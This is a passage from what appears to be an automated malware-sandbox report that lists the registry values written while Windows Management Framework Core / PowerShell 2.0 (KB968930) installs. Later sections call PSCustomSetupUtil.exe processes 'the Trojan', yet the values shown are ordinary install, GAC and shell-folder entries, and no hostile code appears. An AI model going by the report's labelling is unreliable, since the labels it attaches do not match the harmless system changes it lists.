"EventMessageFile" = "%systemroot%\system32\WsmRes.dll"

[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}\LocalServer32]
"ServerExecutable" = "%System%\wsmprovhost.exe"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""

[HKCR\CLSID\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\InprocServer32]
"(Default)" = "%System%\winrssrv.dll"

[HKLM\System\CurrentControlSet\Control\Session Manager\Environment]
"PSModulePath" = "%System%\WindowsPowerShell\v1.0\Modules\"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\WINRM]
"CoInitializeSecurityParam" = "1"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell]
"Path" = "%System%\WindowsPowerShell\v1.0\powershell.exe"

[HKCR\Microsoft.PowerShellConsole.1]
"FriendlyTypeName" = "Windows PowerShell Console File"

[HKCR\Microsoft.PowerShellModule.1\shell\Edit\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell_ise.exe %1"

[HKCR\WSMan.InternalAutomation]
"(Default)" = "WSMan InternalAutomation Class"

[HKCR\Microsoft.PowerShellData.1]
"FriendlyTypeName" = "Windows PowerShell Data File"

[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}\LocalServer32]
"(Default)" = "%System%\wsmprovhost.exe"

[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0]
"(Default)" = "Microsoft WSMAN Automation V1.0 Library"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\WINRM]
"AuthenticationCapabilities" = "12320"

[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}\TypeLib]
"Version" = "1.0"

[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational]
"Retention" = "0"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\KB968930]
"EventMessageFile" = "%SystemRoot%\System32\spmsg.dll"

[HKCR\CLSID\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}]
"(Default)" = "PSFactoryBuffer"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"PublishingGroup" = "Management and Infrastructure Group"

[HKCR\Microsoft.PowerShellConsole.1\shell\open\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell.exe -p %1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"Retention" = "0"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsPutSignature"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\WinRM]
"ParameterMessageFile" = "%systemroot%\system32\kernel32.dll"

[HKLM\SYSTEM\LastKnownGoodRecovery\LastGood]
"INF/oem11.inf" = "1"

[HKLM\System\CurrentControlSet\Services\WinRM]
"DependOnService" = "RPCSS, HTTP, HTTPFilter"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\WinRM]
"TypesSupported" = "7"

[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}]
"(Default)" = "IWSManEx"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"TSAware" = "1"

[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\AppID\{3e5ca495-8d6a-4d1f-ad99-177b426c8b8e}]
"(Default)" = "Microsoft Windows Remote Shell Host"

[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\InprocServer32]
"(Default)" = "%System%\WSMAUTO.DLL"

[HKCR\CLSID\{f4f7d085-cd01-43f9-899d-179c6df5ddad}\InprocServer32]
"ThreadingModel" = "Both"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"ConsoleHostModuleName" = "%System%\WindowsPowerShell\v1.0\Microsoft.PowerShell.ConsoleHost.dll"

[HKCR\WSMan.Automation\CLSID]
"(Default)" = "{BCED617B-EC03-420b-8508-977DC7A686BD}"

[HKCR\WSMan.Automation.1\CLSID]
"(Default)" = "{BCED617B-EC03-420b-8508-977DC7A686BD}"

[HKLM\System\CurrentControlSet\Services\WinRM]
"Type" = "32"

[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational\EventForwarder-Operational]
"EventMessageFile" = "%systemroot%\system32\wevtfwd.dll"

[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\VersionIndependentProgID]
"(Default)" = "WSMan.Automation"

[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\System\CurrentControlSet\Services\WinRM]
"DisplayName" = "Windows Remote Management (WS-Management)"

[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}\TypeLib]
"Version" = "1.0"

[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0\0\win32]
"(Default)" = "%System%\WsmAuto.dll"

[HKCR\Microsoft.PowerShellConsole.1]
"EditFlags" = "131072"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"ReleaseType" = "Software Update"

[HKCR\WSMan.InternalAutomation.1\CLSID]
"(Default)" = "{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}"

[HKCR\WSMan.Automation\CurVer]
"(Default)" = "WSMan.Automation.1"

[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\ProgID]
"(Default)" = "WSMan.InternalAutomation.1"

[HKCR\.ps1xml]
"(Default)" = "Microsoft.PowerShellXmlData.1"

[HKCR\Interface\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\NumMethods]
"(Default)" = "4"

[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"

[HKLM\System\CurrentControlSet\Services\WinRM]
"ImagePath" = "%WinDir%\System32\svchost.exe -k WinRM"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"MaxSize" = "15728640"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "68 6E FA 50 B6 97 86 7E F6 06 50 B0 DB B3 2C AE"

[HKCR\CLSID\{F73C1438-71B4-4D91-AD13-1F889A03AC67}]
"(Default)" = "PSFactoryBuffer"

[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}]
"(Default)" = "PSFactoryBuffer"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"Sources" = "PowerShell"

[HKCR\AppID\{3feb2f63-0eec-4b96-84ab-da1307e0117c}]
"LaunchPermission" = "01 00 04 80 98 00 00 00 A4 00 00 00 00 00 00 00"

[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational]
"MaxSize" = "20971520"

[HKLM\System\CurrentControlSet\Services\WinRM\Parameters]
"ServiceDll" = "%SystemRoot%\system32\WsmSvc.dll"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\1033]
"Install" = "1"

[HKCR\Microsoft.PowerShellScript.1\DefaultIcon]
"(Default)" = "%System%\WindowsPowerShell\V1.0\powershell_ise.exe,1"

[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\VersionIndependentProgID]
"(Default)" = "WSMan.InternalAutomation"

[HKCR\Microsoft.PowerShellData.1\shell\Edit\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell_ise.exe %1"

[HKLM\System\CurrentControlSet\Services\WinRM\Parameters]
"seRVicemAIN" = "ServiceMain"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\EventForwarder]
"TypesSupported" = "7"

[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}\TypeLib]
"Version" = "1.0"

[HKCR\Microsoft.PowerShellData.1\shell\Open\command]
"(Default)" = "%System%\notepad.exe %1"

[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}\TypeLib]
"Version" = "1.0"

[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}]
"AppID" = "{3e5ca495-8d6a-4d1f-ad99-177b426c8b8e}"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"InstallerVersion" = "6.1.29.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"DisplayIcon" = "%System%\WindowsPowerShell\v1.0\WTRInstaller.ico"

[HKCR\.psc1]
"Content Type" = "application/PowerShell"

[HKCR\Microsoft.PowerShellXmlData.1]
"EditFlags" = "131072"

[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}]
"(Default)" = "WSMan InternalAutomation Class"

[HKLM\SYSTEM\LastKnownGoodRecovery\LastGood]
"INF/oem11.PNF" = "1"

[HKCR\Microsoft.PowerShellData.1]
"EditFlags" = "131072"

[HKCR\Microsoft.PowerShellXmlData.1]
"FriendlyTypeName" = "Windows PowerShell XML Document"

[HKLM\System\CurrentControlSet\Services\WinRM]
"ErrorControl" = "1"

[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}\TypeLib]
"Version" = "1.0"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"ARPLink" = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930"

[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}]
"(Default)" = "IWSManResourceLocatorInternal"

[HKCR\Interface\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\ProxyStubClsid32]
"(Default)" = "{F73C1438-71B4-4D91-AD13-1F889A03AC67}"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"AutoBackupLogFiles" = "0"

[HKCR\Interface\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\ProxyStubClsid32]
"(Default)" = "{F73C1438-71B4-4D91-AD13-1F889A03AC67}"

[HKCR\WSMan.InternalAutomation\CLSID]
"(Default)" = "{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"NoRepair" = "1"

[HKCR\CLSID\{f4f7d085-cd01-43f9-899d-179c6df5ddad}]
"(Default)" = "WinRM WMI Provider for User Profile"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"UninstallString" = "%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe"

[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\WSMan.Automation.1]
"(Default)" = "WSMan Automation Class"

[HKLM\SOFTWARE\Microsoft\PowerShell\1]
"Install" = "1"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"RuntimeVersion" = "v2.0.50727"

[HKCR\Interface\{17245DB2-74E5-45F6-8843-B7AEF309B6D6}]
"(Default)" = "IWSManProvHost"

[HKCR\Microsoft.PowerShellModule.1]
"FriendlyTypeName" = "Windows PowerShell Script Module"

[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\InprocServer32]
"(Default)" = "%System%\WSMAUTO.DLL"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"PackageVersion" = "1.0"

[HKCR\CLSID\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\InprocServer32]
"ThreadingModel" = "Both"

[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}\LocalServer32]
"ServerExecutable" = "%System%\winrshost.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"DisplayName" = "Windows Management Framework Core"
"InstallDate" = "20151205"

[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"Publisher" = "Microsoft Corporation"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"AllowProtectedRenames" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"ReleaseType" = "Software Update"

[HKCR\Interface\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\NumMethods]
"(Default)" = "4"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsDelSignature"

[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\InprocServer32]
"ThreadingModel" = "Both"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""

[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}]
"(Default)" = "IWSMan"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"PowerShellVersion" = "2.0"

[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\ProgID]
"(Default)" = "WSMan.Automation.1"

[HKCR\Microsoft.PowerShellScript.1\shell\Edit\command]
"(Default)" = "%System%\WindowsPowerShell\V1.0\powershell_ise.exe %1"

[HKLM\System\CurrentControlSet\Services\WinRM]
"DependOnGroup" = ""

[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}]
"(Default)" = "WSMan Automation Class"

[HKCR\Microsoft.PowerShellScript.1\shell\Open\command]
"(Default)" = "%System%\notepad.exe %1"

[HKCR\Interface\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}]
"(Default)" = "IHost"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"Publisher" = "Microsoft Corporation"

[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKCR\Interface\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\ProxyStubClsid32]
"(Default)" = "{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}"

[HKCR\CLSID\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\InprocServer32]
"(Default)" = "%System%\wsmplpxy.dll"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"ApplicationBase" = "%System%\WindowsPowerShell\v1.0"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"InstallerName" = "Update.exe"

[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}]
"AppID" = "{3feb2f63-0eec-4b96-84ab-da1307e0117c}"

[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}]
"(Default)" = "Microsoft Windows Remote Shell Host"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"PackageName" = "Windows Management Framework Core"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""

[HKCR\Microsoft.PowerShellScript.1]
"FriendlyTypeName" = "Windows PowerShell Script"

[HKLM\System\CurrentControlSet\Services\WinRM]
"Description" = "Allows access to management information from local and remote machines."

[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}]
"(Default)" = "IWSManSession"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"HelpLink" = "http://go.microsoft.com/fwlink/?LinkID=163790"

[HKCR\WSMan.InternalAutomation.1]
"(Default)" = "WSMan Internal Class"

[HKCR\.psm1]
"(Default)" = "Microsoft.PowerShellModule.1"

[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0\HELPDIR]
"(Default)" = "%System%"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsVerifyHash"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Plugin\Microsoft.PowerShell]
"ConfigXML" = ""

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell\PowerShell]
"CategoryMessageFile" = "%System%\WindowsPowerShell\v1.0\pwrshmsg.dll"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsCreateHash"

[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{17245DB2-74E5-45F6-8843-B7AEF309B6D6}\ProxyStubClsid32]
"(Default)" = "{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}"

[HKCR\WSMan.Automation]
"(Default)" = "WSMan Automation Class"

[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational]
"file" = "%systemroot%\system32\config\EventForwarding-Operational.Evt"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsIsMyFileType"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"URLInfoAbout" = "http://go.microsoft.com/fwlink/?LinkID=163792"
"RegistryLocation" = " HKLM,SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930"

[HKCR\Interface\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\NumMethods]
"(Default)" = "4"

[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational\EventForwarder-Operational]
"TypesSupported" = "7"

[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\InprocServer32]
"ThreadingModel" = "Both"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN]
"SupportsCompatListeners" = "1"

[HKCR\Interface\{F73C1438-71B4-4D91-AD13-1F889A03AC67}]
"(Default)" = "IShell"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""

[HKCR\CLSID\{f4f7d085-cd01-43f9-899d-179c6df5ddad}\InprocServer32]
"(Default)" = "%System%\winrmprov.dll"

[HKCR\.ps1]
"(Default)" = "Microsoft.PowerShellScript.1"

[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}\TypeLib]
"Version" = "1.0"

[HKLM\System\CurrentControlSet\Services\WinRM]
"ObjectName" = "NT AUTHORITY\NetworkService"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\EventForwarder]
"EventMessageFile" = "%systemroot%\system32\wevtfwd.dll"

[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}\LocalServer32]
"(Default)" = "%System%\winrshost.exe"

[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}]
"(Default)" = "Microsoft Windows WSMan Provider Host"

[HKLM\SOFTWARE\Microsoft\PowerShell\1]
"PID" = "89383-100-0001260-04309"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"ConsoleHostAssemblyName" = "Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil"

[HKCR\.psd1]
"(Default)" = "Microsoft.PowerShellData.1"

[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}]
"(Default)" = "IWSManEnumerator"

[HKCR\CLSID\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\InprocServer32]
"(Default)" = "%System%\winrssrv.dll"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell\PowerShell]
"EventMessageFile" = "%System%\WindowsPowerShell\v1.0\pwrshmsg.dll"

[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}\TypeLib]
"Version" = "1.0"

The process PSCustomSetupUtil.exe:3920 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D7 E6 EF 14 F0 7B A1 39 0D 54 F9 58 13 69 06 C7"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Management,1.0.0.0,,31bf3856ad364e35,MSIL" = "C2 5A 22 AF 05 2F D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "189"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Management, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "190"
"StoreChangeIDFor64BitProcesses" = "168"
"StoreChangeIDFor32BitProcesses" = "189"

The process PSCustomSetupUtil.exe:2868 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "82 BF 80 42 D8 24 4C 59 E1 92 C7 83 D0 CB A4 F7"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GraphicalHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GraphicalHost,1.0.0.0,,31bf3856ad364e35,MSIL" = "C0 4D 3F C4 05 2F D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "204"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "205"
"StoreChangeIDFor64BitProcesses" = "183"
"StoreChangeIDFor32BitProcesses" = "204"

The process PSCustomSetupUtil.exe:2908 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2A AF 6A 0E 7E 15 09 0E CF FE D9 38 DC 88 CC BB"

[HKLM\SOFTWARE\Microsoft\Fusion\References\System.Management.Automation, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"System.Management.Automation,1.0.0.0,,31bf3856ad364e35,MSIL" = "00 42 E5 AD 05 2F D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "187"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "188"
"StoreChangeIDFor64BitProcesses" = "166"
"StoreChangeIDFor32BitProcesses" = "187"

The process PSCustomSetupUtil.exe:1784 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "82 FC FA 14 E8 E6 DB 03 43 00 AA 9D 51 65 95 60"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Utility, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "190"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Utility,1.0.0.0,,31bf3856ad364e35,MSIL" = "46 5F 6B B0 05 2F D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "191"
"StoreChangeIDFor64BitProcesses" = "169"
"StoreChangeIDFor32BitProcesses" = "190"

The process PSCustomSetupUtil.exe:2924 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6B 7A 15 50 E7 B0 BD 66 C6 0E DC 48 9A DC 57 98"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.BackgroundIntelligentTransfer.Management.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.BackgroundIntelligentTransfer.Management.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "D4 B1 C5 BB 05 2F D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "203"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
